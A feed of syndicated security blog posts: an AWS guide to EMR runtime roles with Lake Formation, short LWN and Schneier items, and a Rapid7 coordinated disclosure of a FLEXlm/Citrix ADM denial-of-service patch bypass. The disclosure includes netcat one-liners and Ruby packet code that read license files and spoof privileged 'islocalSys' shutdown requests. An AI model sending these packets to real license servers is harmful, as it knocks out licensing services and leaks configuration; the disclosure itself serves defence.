                        "Type": "string"
                    },
                    {
                        "Name": "city",
                        "Type": "string"
                    },
                    {
                        "Name": "address",
                        "Type": "string"
                    }
                ],
                "Location": "s3://emr-steps-roles-new-us-east-1/entities-database/users/",
                "InputFormat": "org.apache.hadoop.mapred.TextInputFormat",
                "OutputFormat": "org.apache.hadoop.hive.ql.io.HiveIgnoreKeyTextOutputFormat",
                "Compressed": false,
                "SerdeInfo": {
                    "SerializationLibrary": "org.apache.hadoop.hive.serde2.lazy.LazySimpleSerDe",
                    "Parameters": {
                        "field.delim": ",",
                        "serialization.format": ","
                    }
                }
            },
            "TableType": "EXTERNAL_TABLE",
            "Parameters": {
                "EXTERNAL": "TRUE"
            }
        }
    }

  4. Create the products-table.json file with the following content (substitute emr-steps-roles-new-us-east-1 with your bucket name):
    {
        "TableInput": {
            "Name": "products",
            "StorageDescriptor": {
                "Columns": [{
                        "Name": "product_id",
                        "Type": "string"
                    },
                    {
                        "Name": "name",
                        "Type": "string"
                    },
                    {
                        "Name": "category",
                        "Type": "string"
                    }
                ],
                "Location": "s3://emr-steps-roles-new-us-east-1/entities-database/products/",
                "InputFormat": "org.apache.hadoop.mapred.TextInputFormat",
                "OutputFormat": "org.apache.hadoop.hive.ql.io.HiveIgnoreKeyTextOutputFormat",
                "Compressed": false,
                "SerdeInfo": {
                    "SerializationLibrary": "org.apache.hadoop.hive.serde2.lazy.LazySimpleSerDe",
                    "Parameters": {
                        "field.delim": ",",
                        "serialization.format": ","
                    }
                }
            },
            "TableType": "EXTERNAL_TABLE",
            "Parameters": {
                "EXTERNAL": "TRUE"
            }
        }
    }

  5. With a Lake Formation admin user, create our tables with the following commands:
    aws glue create-table \
        --database-name entities \
        --cli-input-json file://users-table.json
        
    aws glue create-table \
        --database-name entities \
        --cli-input-json file://products-table.json

Set up the Lake Formation data lake locations

To access our tables data in Amazon S3, Lake Formation needs read/write access to them. To achieve that, we have to register Amazon S3 locations where our data resides and specify for them which IAM role to obtain credentials from.

Let’s create our IAM role for the data access.

  1. Create a file called trust-policy-data-access-role.json with the following content:
    {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Sid": "",
                "Effect": "Allow",
                "Principal": {
                    "Service": "lakeformation.amazonaws.com"
                },
                "Action": "sts:AssumeRole"
            }
        ]
    }

  2. Use the policy to create the IAM role emr-demo-lf-data-access-role:
    aws iam create-role \
    --role-name emr-demo-lf-data-access-role \
    --assume-role-policy-document file://trust-policy-data-access-role.json

  3. Create the file data-access-role-policy.json with the following content (substitute emr-steps-roles-new-us-east-1 with your bucket name):
    {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                "Action": [
                    "s3:*"
                ],
                "Resource": [
                    "arn:aws:s3:::emr-steps-roles-new-us-east-1/entities-database",
                    "arn:aws:s3:::emr-steps-roles-new-us-east-1/entities-database/*"
                ]
            },
            {
                "Effect": "Allow",
                "Action": [
                    "s3:ListBucket"
                ],
                "Resource": [
                    "arn:aws:s3:::emr-steps-roles-new-us-east-1"
                ]
            }
        ]
    }

  4. Create our IAM policy:
    aws iam create-policy \
    --policy-name data-access-role-policy \
    --policy-document file://data-access-role-policy.json

  5. Assign to our emr-demo-lf-data-access-role the created policy (replace 123456789012 with your AWS account ID):
    aws iam attach-role-policy \
    --role-name emr-demo-lf-data-access-role \
    --policy-arn "arn:aws:iam::123456789012:policy/data-access-role-policy"

    We can now register our data location in Lake Formation.

  6. On the Lake Formation console, choose Data lake locations in the navigation pane.
  7. Here we can register our S3 location containing data for our two tables and choose the created emr-demo-lf-data-access-role IAM role, which has read/write access to that location.

For more details about adding an Amazon S3 location to your data lake and configuring your IAM data access roles, refer to Adding an Amazon S3 location to your data lake.

Enforce Lake Formation permissions

To be sure we’re using Lake Formation permissions, we should confirm that we don’t have any grants set up for the principal IAMAllowedPrincipals. The IAMAllowedPrincipals group includes any IAM users and roles that are allowed access to your Data Catalog resources by your IAM policies, and it’s used to maintain backward compatibility with AWS Glue.

To confirm Lake Formations permissions are enforced, navigate to the Lake Formation console and choose Data lake permissions in the navigation pane. Filter permissions by “Database”:“entities” and remove all the permissions given to the principal IAMAllowedPrincipals.

For more details on IAMAllowedPrincipals and backward compatibility with AWS Glue, refer to Changing the default security settings for your data lake.

Configure AWS Glue and Lake Formation grants for IAM runtime roles

To allow our IAM runtime roles to properly interact with Lake Formation, we should provide them the lakeformation:GetDataAccess and glue:Get* grants.

Lake Formation permissions control access to Data Catalog resources, Amazon S3 locations, and the underlying data at those locations. IAM permissions control access to the Lake Formation and AWS Glue APIs and resources. Therefore, although you might have the Lake Formation permission to access a table in the Data Catalog (SELECT), your operation fails if you don’t have the IAM permission on the glue:Get* API.

For more details about Lake Formation access control, refer to Lake Formation access control overview.

  1. Create the emr-runtime-roles-lake-formation-policy.json file with the following content:
    {
        "Version": "2012-10-17",
        "Statement": {
            "Sid": "LakeFormationManagedAccess",
            "Effect": "Allow",
            "Action": [
                "lakeformation:GetDataAccess",
                "glue:Get*",
                "glue:Create*",
                "glue:Update*"
            ],
            "Resource": "*"
        }
    }

  2. Create the related IAM policy:
    aws iam create-policy \
    --policy-name emr-runtime-roles-lake-formation-policy \
    --policy-document file://emr-runtime-roles-lake-formation-policy.json

  3. Assign this policy to both IAM runtime roles (replace 123456789012 with your AWS account ID):
    aws iam attach-role-policy \
    --role-name test-emr-demo1 \
    --policy-arn "arn:aws:iam::123456789012:policy/emr-runtime-roles-lake-formation-policy"
    
    aws iam attach-role-policy \
    --role-name test-emr-demo2 \
    --policy-arn "arn:aws:iam::123456789012:policy/emr-runtime-roles-lake-formation-policy"

Set up Lake Formation permissions

We now set up the permission in Lake Formation for the two runtime roles.

  1. Create the file users-grants-test-emr-demo1.json with the following content to grant SELECT access to all columns in the entities.users table to test-emr-demo1:
    {
        "Principal": {
            "DataLakePrincipalIdentifier": "arn:aws:iam::123456789012:role/test-emr-demo1"
        },
        "Resource": {
            "Table": {
                "DatabaseName": "entities",
                "Name": "users"
            }
        },
        "Permissions": [
            "SELECT"
        ]
    }

  2. Create the file users-grants-test-emr-demo2.json with the following content to grant SELECT access to the uid and state columns in the entities.users table to test-emr-demo2:
    {
        "Principal": {
            "DataLakePrincipalIdentifier": "arn:aws:iam::123456789012:role/test-emr-demo2"
        },
        "Resource": {
            "TableWithColumns": {
                "DatabaseName": "entities",
                "Name": "users",
                "ColumnNames": ["uid", "state"]
            }
        },
        "Permissions": [
            "SELECT"
        ]
    }

  3. Create the file products-grants-test-emr-demo2.json with the following content to grant SELECT access to all columns in the entities.products table to test-emr-demo2:
    {
        "Principal": {
            "DataLakePrincipalIdentifier": "arn:aws:iam::123456789012:role/test-emr-demo2"
        },
        "Resource": {
            "Table": {
                "DatabaseName": "entities",
                "Name": "products"
            }
        },
        "Permissions": [
            "SELECT"
        ]
    }

  4. Let’s set up our permissions in Lake Formation:
    aws lakeformation grant-permissions \
    --cli-input-json file://users-grants-test-emr-demo1.json
    
    aws lakeformation grant-permissions \
    --cli-input-json file://users-grants-test-emr-demo2.json
    
    aws lakeformation grant-permissions \
    --cli-input-json file://products-grants-test-emr-demo2.json

  5. Check the permissions we defined on the Lake Formation console on the Data lake permissions page by filtering by “Database”:“entities”.

Test Lake Formation permissions with runtime roles

For our test, we use a PySpark application called test-lake-formation.py with the following content:


from pyspark.sql import SparkSession
 
spark = SparkSession.builder.appName("Pyspark - TEST IAM RBAC with LF").enableHiveSupport().getOrCreate()

try:
    print("== select * from entities.users limit 3 ==\n")
    spark.sql("select * from entities.users limit 3").show()
except Exception as e:
    print(e)

try:
    print("== select * from entities.products limit 3 ==\n")
    spark.sql("select * from entities.products limit 3").show()
except Exception as e:
    print(e)

spark.stop()

In the script, we’re trying to access the tables users and products. Let’s upload our Spark application in the same S3 bucket that we used earlier:

#Change this with your bucket name
BUCKET_NAME="emr-steps-roles-new-us-east-1"

aws s3 cp test-lake-formation.py s3://${BUCKET_NAME}/scripts/

We’re now ready to perform our test. We run the test-lake-formation.py script first using the test-emr-demo1 role and then using the test-emr-demo2 role as the runtime roles.

Let’s submit a step specifying test-emr-demo1 as the runtime role:

#Change with your EMR cluster ID
CLUSTER_ID=j-XXXXXXXXXXXXX
#Change with your AWS Account ID
ACCOUNT_ID=123456789012
#Change with your Bucket name
BUCKET_NAME=emr-steps-roles-new-us-east-1

aws emr add-steps \
--cluster-id $CLUSTER_ID \
--steps '[{
            "Type": "CUSTOM_JAR",
            "ActionOnFailure": "CONTINUE",
            "Jar": "command-runner.jar",
            "Name": "Spark Lake Formation Example",
            "Args": [
              "spark-submit",
              "s3://'"${BUCKET_NAME}"'/scripts/test-lake-formation.py"
            ]
        }]' \
--execution-role-arn arn:aws:iam::${ACCOUNT_ID}:role/test-emr-demo1

The following is the output of the EMR step with test-emr-demo1 as the runtime role:

== select * from entities.users limit 3 ==

+--------+-----+-------+-------+------+--------------------+
|     uid| name|surname|  state|  city|             address|
+--------+-----+-------+-------+------+--------------------+
|00005678| john|   pike|england|london|      Hidden Road 78|
|00009039|paolo|  rossi|  italy| milan|Via degli Alberi 56A|
|00009057| july|   finn|germany|berlin|       Green Road 90|
+--------+-----+-------+-------+------+--------------------+

== select * from entities.products limit 3 ==

Insufficient Lake Formation permission(s) on products (...)

As we can see, our application was only able to access the users table.

Submit the same script again as a new EMR step, but this time with the role test-emr-demo2 as the runtime role:

#Change with your EMR cluster ID
CLUSTER_ID=j-XXXXXXXXXXXXX
#Change with your AWS Account ID
ACCOUNT_ID=123456789012
#Change with your Bucket name
BUCKET_NAME=emr-steps-roles-new-us-east-1

aws emr add-steps \
--cluster-id $CLUSTER_ID \
--steps '[{
            "Type": "CUSTOM_JAR",
            "ActionOnFailure": "CONTINUE",
            "Jar": "command-runner.jar",
            "Name": "Spark Lake Formation Example",
            "Args": [
              "spark-submit",
              "s3://'"${BUCKET_NAME}"'/scripts/test-lake-formation.py"
            ]
        }]' \
--execution-role-arn arn:aws:iam::${ACCOUNT_ID}:role/test-emr-demo2

The following is the output of the EMR step with test-emr-demo2 as the runtime role:

== select * from entities.users limit 3 ==

+--------+-------+
|     uid|  state|
+--------+-------+
|00005678|england|
|00009039|  italy|
|00009057|germany|
+--------+-------+

== select * from entities.products limit 3 ==

+----------+---------------+----------+
|product_id|           name|  category|
+----------+---------------+----------+
|  P0000789|       Bike2000|     Sport|
|  P0000567|   CoverToCover|Smartphone|
|  P0005677|Whiteboard X786|      Home|
+----------+---------------+----------+

As we can see, our application was able to access a subset of columns for the users table and all the columns for the products table.

We can conclude that the permissions while accessing the Data Catalog are being enforced based on the runtime role used with the EMR step.

Audit using the source identity

The source identity is a mechanism to monitor and control actions taken with assumed roles. The Propagate source identity feature similarly allows you to monitor and control actions taken using runtime roles by the jobs submitted with EMR steps.

We already configured EMR_EC2_defaultRole with "sts:SetSourceIdentity" on our two runtime roles. Also, both runtime roles let EMR_EC2_DefaultRole to SetSourceIdentity in their trust policy. So we’re ready to proceed.

We now see the Propagate source identity feature in action with a simple example.

Configure the IAM role that is assumed to submit the EMR steps

We configure the IAM role job-submitter-1, which is assumed specifying the source identity and which is used to submit the EMR steps. In this example, we allow the IAM user paul to assume this role and set the source identity. Please note you can use any IAM principal here.

  1. Create a file called trust-policy-2.json with the following content (replace 123456789012 with your AWS account ID):
    {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                "Principal": {
                    "AWS": "arn:aws:iam::123456789012:user/paul"
                },
                "Action": "sts:AssumeRole"
            },
            {
                "Effect": "Allow",
                "Principal": {
                    "AWS": "arn:aws:iam::123456789012:user/paul"
                },
                "Action": "sts:SetSourceIdentity"
            }
        ]
    }

  2. Use it as the trust policy to create the IAM role job-submitter-1:
    aws iam create-role \
    --role-name job-submitter-1 \
    --assume-role-policy-document file://trust-policy-2.json

    We use now the same emr-runtime-roles-submitter-policy policy we defined before to allow the role to submit EMR steps using the test-emr-demo1 and test-emr-demo2 runtime roles.

  3. Assign this policy to the IAM role job-submitter-1 (replace 123456789012 with your AWS account ID):
    aws iam attach-role-policy \
    --role-name job-submitter-1 \
    --policy-arn "arn:aws:iam::123456789012:policy/emr-runtime-roles-submitter-policy"

Test the source identity with AWS CloudTrail

To show how propagation of source identity works with Amazon EMR, we generate a role session with the source identity test-ad-user.

With the IAM user paul (or with the IAM principal you configured), we first perform the impersonation (replace 123456789012 with your AWS account ID):

aws sts assume-role \
--role-arn arn:aws:iam::123456789012:role/job-submitter-1 \
--role-session-name demotest \
--source-identity test-ad-user

The following code is the output received:

{
"Credentials": {
    "SecretAccessKey": "<SECRET_ACCESS_KEY>",
    "SessionToken": "<SESSION_TOKEN>",
    "Expiration": "<EXPIRATION_TIME>",
    "AccessKeyId": "<ACCESS_KEY_ID>"
},
"AssumedRoleUser": {
    "AssumedRoleId": "AROAUVT2HQ3......:demotest",
    "Arn": "arn:aws:sts::123456789012:assumed-role/test-emr-role/demotest"
},
"SourceIdentity": "test-ad-user"
}

We use the temporary AWS security credentials of the role session, to submit an EMR step along with the runtime role test-emr-demo1:

export AWS_ACCESS_KEY_ID="<ACCESS_KEY_ID>"
export AWS_SECRET_ACCESS_KEY="<SECRET_ACCESS_KEY>"
export AWS_SESSION_TOKEN="<SESSION_TOKEN>" 

#Change with your EMR cluster ID
CLUSTER_ID=j-XXXXXXXXXXXXX
#Change with your AWS Account ID
ACCOUNT_ID=123456789012
#Change with your Bucket name
BUCKET_NAME=emr-steps-roles-new-us-east-1

aws emr add-steps \
--cluster-id $CLUSTER_ID \
--steps '[{
            "Type": "CUSTOM_JAR",
            "ActionOnFailure": "CONTINUE",
            "Jar": "command-runner.jar",
            "Name": "Spark Lake Formation Example",
            "Args": [
              "spark-submit",
              "s3://'"${BUCKET_NAME}"'/scripts/test-lake-formation.py"
            ]
        }]' \
--execution-role-arn arn:aws:iam::${ACCOUNT_ID}:role/test-emr-demo1

In a few minutes, we can see events appearing in the AWS CloudTrail log file. We can see all the AWS APIs that the jobs invoked using the runtime role. In the following snippet, we can see that the step performed the sts:AssumeRole and lakeformation:GetDataAccess actions. It’s worth noting how the source identity test-ad-user has been preserved in the events.

Clean up

You can now delete the EMR cluster you created.

  1. On the Amazon EMR console, choose Clusters in the navigation pane.
  2. Select the cluster iam-passthrough-cluster, then choose Terminate.
  3. Choose Terminate again to confirm.

Alternatively, you can delete the cluster by using the Amazon EMR CLI with the following command (replace the EMR cluster ID with the one returned by the previously run aws emr create-cluster command):

aws emr terminate-clusters --cluster-ids j-3KVXXXXXXX7UG

Conclusion

In this post, we discussed how you can control data access on Amazon EMR on EC2 clusters by using runtime roles with EMR steps. We discussed how the feature works, how you can use Lake Formation to apply fine-grained access controls, and how to monitor and control actions using a source identity. To learn more about this feature, refer to Configure runtime roles for Amazon EMR steps.


About the authors

Stefano Sandona is an Analytics Specialist Solution Architect with AWS. He loves data, distributed systems and security. He helps customers around the world architecting their data platforms. He has a strong focus on Amazon EMR and all the security aspects around it.

Sharad Kala is a senior engineer at AWS working with the EMR team. He focuses on the security aspects of the applications running on EMR. He has a keen interest in working and learning about distributed systems.

[$] Identity management for WireGuard

Post Syndicated from original https://lwn.net/Articles/910766/

Since its inclusion in the Linux kernel, the WireGuard VPN tunnel has become
increasingly popular. In general, WireGuard is simpler to configure than
other VPNs, but the approach that it takes to authentication can present
some challenges. Each node in a WireGuard network has a cryptographic key
that serves as the node’s identity;
nodes that do not know each other’s keys cannot directly communicate.
Keeping
track of these keys and distributing them to the other nodes
in a mesh network quickly becomes a chore as the network grows.
Fortunately, there are now
several open-source
tools that can automate the management of these keys and make using
WireGuard easier for both administrators and end users.

Security updates for Tuesday

Post Syndicated from original https://lwn.net/Articles/911562/

Security updates have been issued by Debian (glibc and libksba), Fedora (dhcp and kernel), Red Hat (.NET 6.0, .NET Core 3.1, compat-expat1, kpatch-patch, and nodejs:16), Slackware (xorg), SUSE (exiv2, expat, kernel, libreoffice, python, python-numpy, squid, and virtualbox), and Ubuntu (linux-azure and zlib).

FLEXlm and Citrix ADM Denial of Service Vulnerability

Post Syndicated from Ron Bowes original https://blog.rapid7.com/2022/10/18/flexlm-and-citrix-adm-denial-of-service-vulnerability/

On June 27, 2022, Citrix released an advisory for CVE-2022-27511 and CVE-2022-27512, which affect Citrix ADM (Application Delivery Management).

Rapid7 investigated these issues to better understand their impact, and found that the patch is not sufficient to prevent exploitation. We also determined that the worst outcome of this vulnerability is a denial of service – the licensing server can be told to shut down (even with the patch). We were not able to find a way to reset the admin password, as the original bulletin indicated.

In the course of investigating CVE-2022-27511 and CVE-2022-27512, we determined that the root cause of the issues in Citrix ADM was a vulnerable implementation of popular licensing software FLEXlm, also known as FlexNet Publisher. This disclosure addresses both the core issue in FLEXlm and Citrix ADM’s implementation of it (which resulted in both the original CVEs and later the patch bypass our research team discovered). Rapid7 coordinated disclosure with both companies and CERT/CC.

As of this publication, these issues remain unpatched, so IT defenders are urged to reach out to Revenera and Citrix for direct guidence on mitigating these denial of service vulnerabilities and CVE assignment.

Products

FLEXlm is a license management application that is part of FlexNet licensing, provided by Revenera’s Flexnet Software, and is used for license provisioning on many popular network applications, including Citrix ADM. You can read more about FlexNet at the vendor’s website.

Citrix ADM is an application provisioning solution from Citrix, which uses FLEXlm for license management. You can read more about Citrix ADM at the vendor’s website.

Discoverer

This issue was discovered by Ron Bowes of Rapid7 while researching CVE-2022-27511 in Citrix ADM. It is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Exploitation

Citrix ADM runs on FreeBSD, and remote administrative logins are possible. Using that, we compared two different versions of the Citrix ADM server – before and after the patch.

Eventually, we went through each network service, one by one, to check what each one did and whether the patch may have fixed something. When we got to TCP port 27000, we found that lmgrd was running. Looking up lmgrd, we determined that it’s a licensing server made by FLEXlm called FlexNet Licensing (among other names), made by Revenera. Since the bulletin calls out licensing disruption, this seemed like a sensible place to look; from the bulletin:

Temporary disruption of the ADM license service. The impact of this includes preventing new licenses from being issued or renewed by Citrix ADM.

If we look at how lmgrd is executed before and after the patch, we find that the command line arguments changed; before:

bash-3.2# ps aux | grep lmgrd
root         3506   0.0  0.0   10176   6408  -  S    19:22      0:09.67 /netscaler/lmgrd -l /var/log/license.log -c /mpsconfig/license

And after:

bash-3.2# ps aux | grep lmgrd
root         5493   0.0  0.0   10176   5572  -  S    13:15     0:02.45 /netscaler/lmgrd -2 -p -local -l /var/log/license.log -c /mpsconfig/license

If we look at some online documentation, we see that the -2 -p flags are security-related:

-2 -p    Restricts usage of lmdown, lmreread, and lmremove to a FLEXlm administrator who is by default root. [...]

Patch Analysis

We tested a Linux copy of FlexNet 11.18.3.1, which allowed us to execute and debug Flex locally. Helpfully, the various command line utilities that FlexNet uses to perform actions (accessible via lmutil) use a TCP connection to localhost, allowing us to analyze the traffic. For example, the following command:

$ ./lmutil lmreread -c ./license/citrix_startup.lic
lmutil - Copyright (c) 1989-2021 Flexera. All Rights Reserved.
lmreread successful

Generates a lot of traffic going to localhost:27000, including:

Sent:

00000000  2f 4c 0f b0 00 40 01 02  63 05 2c 85 00 00 00 00   /L...@.. c.,.....
00000010  00 00 00 02 01 04 0b 12  00 54 00 78 00 02 0b af   ........ .T.x....
00000020  72 6f 6e 00 66 65 64 6f  72 61 00 2f 64 65 76 2f   ron.fedo ra./dev/
00000030  70 74 73 2f 32 00 00 78  36 34 5f 6c 73 62 00 01   pts/2..x 64_lsb..

Received:

    00000000  2f 8f 09 c6 00 26 01 0e  63 05 2c 85 41 00 00 00   /....&.. c.,.A...
    00000010  00 00 00 02 0b 12 01 04  00 66 65 64 6f 72 61 00   ........ .fedora.
    00000020  6c 6d 67 72 64 00                                  lmgrd.

Sent:

00000040  2f 23 34 78 00 24 01 07  63 05 2c 86 00 00 00 00   /#4x.$.. c.,.....
00000050  00 00 00 02 72 6f 6e 00  66 65 64 6f 72 61 00 00   ....ron. fedora..
00000060  92 00 00 0a                                        ....

Received:

    00000026  2f 54 18 b9 00 a8 00 4f  63 05 2c 86 41 00 00 00   /T.....O c.,.A...
    00000036  00 00 00 02 4f 4f 00 00  00 00 00 00 00 00 00 00   ....OO.. ........
    00000046  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
    00000056  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
    00000066  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
    00000076  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
    00000086  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
    00000096  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
    000000A6  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
    000000B6  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
    000000C6  00 00 00 00 00 00 00 00                            ........ 

If we start the service with the -2 -p flag, we can no longer run lmreread:

$ ./lmutil lmreread -c ./license/citrix_startup.lic
lmutil - Copyright (c) 1989-2021 Flexera. All Rights Reserved.
lmreread failed: You are not a license administrator. (-63,294)

That appears to be working as intended! Or does it?

Protocol Analysis

We spent a substantial amount of time reverse engineering FlexNet’s protocol. FlexNet uses a binary protocol with a lot of support and code paths for different (and deprecated) versions of the protocol. But we built a tool (that you can get on GitHub) that implements the interesting parts of the protocol.

It turns out, even ignoring the vulnerability, you can do a whole bunch of stuff against the FlexNet service, and none of it even requires authentication! For example, you can grab the path to the license file:

$ echo -ne "\x2f\xa9\x21\x3a\x00\x3f\x01\x08\x41\x41\x41\x41\x42\x42\x42\x42\x43\x00\x44\x44\x01\x04\x72\x6f\x6f\x74\x00\x43\x69\x74\x72\x69\x78\x41\x44\x4d\x00\x6c\x6d\x67\x72\x64\x00\x2f\x64\x65\x76\x2f\x70\x74\x73\x2f\x31\x00\x67\x65\x74\x70\x61\x74\x68\x73\x00" | nc 10.0.0.9 27000
LW37/mpsconfig/license/citrix_startup.lic

You can even grab the whole license file:

$ echo -ne "\x2f\x8a\x17\x2d\x00\x37\x01\x08\x41\x41\x41\x41\x42\x42\x42\x42\x43\x00\x44\x44\x01\x04\x72\x6f\x6f\x74\x00\x43\x69\x74\x72\x69\x78\x41\x44\x4d\x00\x6c\x6d\x67\x72\x64\x
00\x2f\x64\x65\x76\x2f\x70\x74\x73\x2f\x31\x00\x00" | nc -v 10.0.0.9 27000
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Connected to 10.0.0.9:27000.
L6194# DO NOT REMOVE THIS COMMENT LINE
# "のコメント行は削除しLK6060NEN
# NE SUPPRIMEZ PAS CETTE LIGNE DE COMMENTAIRE
# NO ELIMINAR ESTA LÍNL5926IX PORT=7279

And you can also remotely re-load the license file and shut down the service if the -p -2 flag is not set when the server starts. That’s the core of the original CVEs – that those flags aren’t used and therefore a remote user can take administrative actions.

Patch Bypass

The problem is, all of the security features (including declaring your username and privilege level) are client-side choices, which means that without knowing any secret information, the client can self-declare that they are privileged.

This is what the "authentication" message looks like in flexnet-tools.rb:

  send_packet(0x2f, 0x0102,
    "\x01\x04" + # If the `\x04` value here is non-zero, we are permitted to log in
    "\x0b\x10" + # Read as a pair of uint16s
    "\x00\x54" + # Read as single uint16
    "\x00\x78" + # Read as single uint16
    "\x00\x00\x16\x97" + # Read as uint32
    "root\x00" +
    "CitrixADM\x00" +
    "/dev/pts/1\x00" +
    "\x00" + # If I add a string here, the response changes
    "x86_f8\x00" +
    "\x01"
  )

In that example, root is the username, and CitrixADM is the host. Those can be set to whatever the client chooses, and permissions and logs will reflect that. The first field, \x01\x04, is also part of the authentication process, where the \x04 value specifically enables remote authorization – while we found the part of the binary that reads that value, we are not clear what the actual purpose is.

By declaring oneself as root@CitrixADM (using that message), it bypasses the need to actually authenticate. The lmdown field, for shutting down the licensing server, has an addition required field:

when 'lmdown'
  out = send_packet(0x2f, 0x010a,
    "\x00" + # Forced?
    "root\x00" + # This is used in a log message
    "CitrixADM\x00" +
    "\x00" +
    "\x01\x00\x00\x7f" +
    "\x00" +
    (LOGIN ? "islocalSys" : "") + # Only attach islocalSys if we're logging in
    "\x00"
  )

The islocalSys value self-identifies the client as privileged, and therefore it is allowed to bypass the -2 -p flag and perform restricted actions. This bypasses the patch.

Impact

Remotely shutting down the FLEXlm licensing server can cause a denial of service condition in the software for which that licensing server is responsible. In this particular case, exploiting this vulnerability can cause a disruption in provisioning licenses through Citrix ADM.

Remediation

In the absence of a vendor-supplied patch, users of software that relies on FLEXlm should not expose port 27000/TCP to untrusted networks. Note that in many cases, this would remove the functionality of the license server entirely.

Disclosure Timeline

This issue was disclosed in accordance with Rapid7’s [vulnerability disclosure] policy(https://www.rapid7.com/security/disclosure/#zeroday), but with a slightly faster initial release to CERT/CC, due to the multivendor nature of the issue.

  • June, 2022: Issues discovered and documented by Rapid7 researcher Ron Bowes
  • Tue, Jul 5, 2022: Disclosed to Citrix via their PSIRT team
    Thu, Jul 7, 2022: Disclosed to Flexera via their PSIRT team
  • Wed, Jul 12, 2022: Disclosed to CERT/CC (VU#300762)
  • July – October, 2022: Disclosure discussions between Rapid7, Citrix, Flexera, and CERT/CC through VINCE (Case 603).
  • Tue, Oct 18, 2022: This public disclosure

Emerging best practices for securing cloud-native environments

Post Syndicated from Rapid7 original https://blog.rapid7.com/2022/10/18/emerging-best-practices-for-securing-cloud-native-environments/

Emerging best practices for securing cloud-native environments

Globally, IT experts recognise security as the most significant barrier to cloud adoption, in part because  many of the ways of securing traditional IT environments are not always applicable to cloud-native infrastructure. As a result, security teams may find themselves behind the curve and struggling to keep up with the ambitious digital transformation programs set by their senior leadership teams.

As technology evolves and threats change rapidly, organizations that stay abreast of the latest developments, trends, and industry standards tend to have fewer security risks than those that don’t. Failure to do so can lead to data breaches, compliance violations and increased costs. From creating a security culture to implementing innovative solutions, it’s clear a new approach to security is required; one that is more automated and based on best practices that consider the following:

Speed vs security

Finding the right balance between security and speed can be difficult, especially when trying to keep pace with your organization’s cloud migration and digital transformation strategy. Securing your continuous integration and delivery (CI/CD) pipeline can be challenging if visibility, governance and compliance lack across your IT environment.

Ensuring errors and missteps are detected and minimised requires a consistent set of processes, people, and tools. By putting challenges into logical groups, you can address each one more effectively.

For example, the first stage of the CI/CD pipeline is vulnerable to human error. Adopting the DevSecOps model adds security to the DevOps working processes as a continuous activity, allowing security policies to be defined and enforced at every pipeline stage — including development and testing environments. Although, moving away from traditional processes requires strong foundations to transform and change.

Operationalising cyber security

As the number of workloads in the cloud increases, security challenges can sometimes fall between the gaps and outside of traditional processes, increasing additional risk from a technical and operational perspective. When everyone understands cybersecurity processes, their importance and why it’s necessary, they’ll take action. Holding people and business units accountable for their efforts lets you measure your cyber security programs’ effectiveness to discover any necessary improvements. This will result in better decision-making and measurable risk reduction; not to mention greater understanding and awareness of security across your organization.

Begin by understanding where and how security gaps are being created. Once you’ve identified these gaps, prioritise them based on business impact and the likelihood of occurrence. Ask your peers; in the event of a breach, what data would you be most concerned about if hackers applied ransomware to it? With this information in hand, it becomes easier to identify the appropriate controls and solutions to help identify your organization’s cyber maturity.

Knowledge sharing

Encouraging knowledge sharing is a great way to help address the skills gap. The more we share our experiences, the easier it is to improve processes and procedures to reduce the risk of mistakes reoccurring. But how do you make sure you get it right?

Join Alex Noble, cloud security lead and Jason Hart, chief technology officer EMEA, for our Lunch and Learn Series: Stay ahead of the curve. During these exclusive, interactive virtual sessions, we will explore emerging best practices driven by new technologies and evolving business models. Don’t miss your chance to connect with local peers and team members over a complimentary virtual lunch.

Join the conversation and save your seat.

Qatar Spyware

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/10/qatar-spyware.html

Everyone visiting Qatar for the World Cup needs to install spyware on their phone.

Everyone travelling to Qatar during the football World Cup will be asked to download two apps called Ehteraz and Hayya.

Briefly, Ehteraz is an covid-19 tracking app, while Hayya is an official World Cup app used to keep track of match tickets and to access the free Metro in Qatar.

In particular, the covid-19 app Ehteraz asks for access to several rights on your mobile., like access to read, delete or change all content on the phone, as well as access to connect to WiFi and Bluetooth, override other apps and prevent the phone from switching off to sleep mode.

The Ehteraz app, which everyone over 18 coming to Qatar must download, also gets a number of other accesses such as an overview of your exact location, the ability to make direct calls via your phone and the ability to disable your screen lock.

The Hayya app does not ask for as much, but also has a number of critical aspects. Among other things, the app asks for access to share your personal information with almost no restrictions. In addition, the Hayya app provides access to determine the phone’s exact location, prevent the device from going into sleep mode, and view the phone’s network connections.

Despite what the article says, I don’t know how mandatory this actually is. I know people who visited Saudi Arabia when that country had a similarly sketchy app requirement. Some of them just didn’t bother downloading the apps, and were never asked about it at the border.

New AWS whitepaper: Using AWS in the Context of Canada’s Controlled Goods Program (CGP)

Post Syndicated from Michael Davie original https://aws.amazon.com/blogs/security/new-aws-whitepaper-using-aws-in-the-context-of-canadas-controlled-goods-program-cgp/

Amazon Web Services (AWS) has released a new whitepaper to help Canadian defense and security customers accelerate their use of the AWS Cloud.

The new guide, Using AWS in the Context of Canada’s Controlled Goods Program (CGP), continues our efforts to help AWS customers navigate the regulatory expectations of the Government of Canada’s Controlled Goods Program in a shared responsibility environment.

This whitepaper is intended for customers that are looking to store and process controlled goods information in the AWS Cloud, and is particularly useful for leadership, security, risk, and compliance teams that need to understand CGP requirements and guidance.

The whitepaper summarizes CGP requirements and guidance related to the protection of controlled goods information, and gives CGP-regulated customers information they can use to commence their due diligence and assess how to implement the appropriate programs for their use of AWS Cloud services.

This document is our first that is specific to Canadian regulatory requirements and joins other guides related to specific regulatory regimes around the world. As the regulatory environment continues to evolve, we’ll provide further updates on the AWS Security Blog and the AWS Compliance page. You can find more information on cloud-related regulatory compliance at the AWS Compliance Center. You can also reach out to your AWS account manager for help finding the resources you need.

 
